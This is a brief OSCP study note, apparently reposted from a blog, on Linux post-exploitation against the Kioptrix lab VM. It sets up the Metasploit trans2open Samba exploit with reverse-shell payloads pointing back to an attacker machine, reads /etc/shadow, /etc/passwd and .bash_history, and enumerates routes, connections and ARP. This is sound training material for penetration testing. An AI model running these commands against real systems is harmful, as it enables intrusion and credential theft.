OSCP Security Technology - Linux Post Exploitation
作者:互联网
OSCP Security Technology - Linux Post Exploitation
Start Metasploit.
msfconsole
Target VM: Kioptrix
Refer to Linux post exploitation cheat sheet: https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
msfvenom -l
Try to Exploit
search trans2open
use exploit/linux/samba/trans2open
set rhost 192.168.1.14
set payload linux/x86/meterpreter/reverse_tcp
show options
set lhost 192.168.1.22
exploit
Failed this time, so let's try another payload type.
set payload generic/shell_reverse_tcp
show options
exploit
cat .bash_history
cat /etc/shadow
cat /etc/passwd
Create shadow and passwd files in Kali.
Route
/sbin/route
netstart
/bin/netstat -ano
ARP
/sbin/arp
Try to find other interesting things...
标签:set,Post,Exploitation,exploit,Linux,Security,payload 来源: https://www.cnblogs.com/keepmoving1113/p/15415905.html